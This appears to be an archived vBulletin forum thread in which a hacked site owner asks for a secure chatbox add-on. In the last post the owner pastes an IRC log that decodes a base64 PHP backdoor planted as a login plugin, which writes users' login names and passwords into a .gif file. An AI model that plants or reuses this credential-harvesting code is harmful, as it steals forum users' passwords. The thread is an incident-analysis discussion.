The Arcive of vBulletin Modifications Site. |
|
|
#1
|
|||
|
|||
|
i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .
|
|
#2
|
||||
|
||||
|
|
|
#3
|
||||
|
||||
|
How do you know it was MGC Chatbox Evo 3.4.0 that allowed hackers to get into your site?
|
|
#4
|
|||
|
|||
|
thanks ozzy . is it real secure? did anyone had problem with it ?
--------------- Added [DATE]1410266511[/DATE] at [TIME]1410266511[/TIME] --------------- not sure if it was MGC Chatbox Evo 3.4.0 that creat that exploit . but for sure it was vsa statitics addon . so aint sure whice of those scripts are secure --------------- Added [DATE]1410268740[/DATE] at [TIME]1410268740[/TIME] --------------- |
|
#5
|
||||
|
||||
|
Yes the DBTech one is secure for sure.
How do you know it was the VSA stats mod that has a exploit? |
|
#6
|
|||
|
|||
|
i am getting error when importing the xml
The requested URL /admin/vbshout.php was not found on this server. damm |
|
#7
|
||||
|
||||
|
You need to load the files that came with the mod before importing the XML, read the instructions in the read me file in the mods zip.
|
|
#8
|
|||
|
|||
|
ya i intalled . but it isnt good like MGC Chatbox Evo whice has many great options
|
|
#9
|
||||
|
||||
|
How do you know it was the VSA stats mod that has a exploit?
What features are missing? |
|
#10
|
|||
|
|||
|
had gif file when opened with notpad showed all users ad passwords .
BiGFiST> well, they added actual plugins <FireBirD> were <FireBirD> whice plug ins they added <BiGFiST> see under vsa stats <BiGFiST> two login location products <BiGFiST> there's base64 php code <BiGFiST> i decrypted that here http://www.base64decode.org/ <BiGFiST> JHN0ciA9ICIiLiRfUE9TVFsndmJfbG9naW5fdXNlcm5hbWUnXS 4iOiIuJF9QT1NUWyd2Yl9sb2dpbl9wYXNzd29yZCddLiJcclxu IjsgDQokZnAgPSBmb3BlbiAoImltYWdlcy9taXNjL3RyZWVfcn guZ2lmIiwgImErIik7IA0KZndyaXRlICgkZnAsICIkc3RyIik7 IA0KZmNsb3NlICgkZnApOw== <BiGFiST> that gives <BiGFiST> $str = "".$_POST['vb_login_username'].":".$_POST['vb_login_password']."\r\n"; <BiGFiST> $fp = fopen ("images/misc/tree_rx.gif", "a+"); <BiGFiST> fwrite ($fp, "$str"); <BiGFiST> fclose ($fp); |
![]() |
|
|
| X vBulletin 3.8.12 by vBS Debug Information | |
|---|---|
|
|
More Information |
|
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|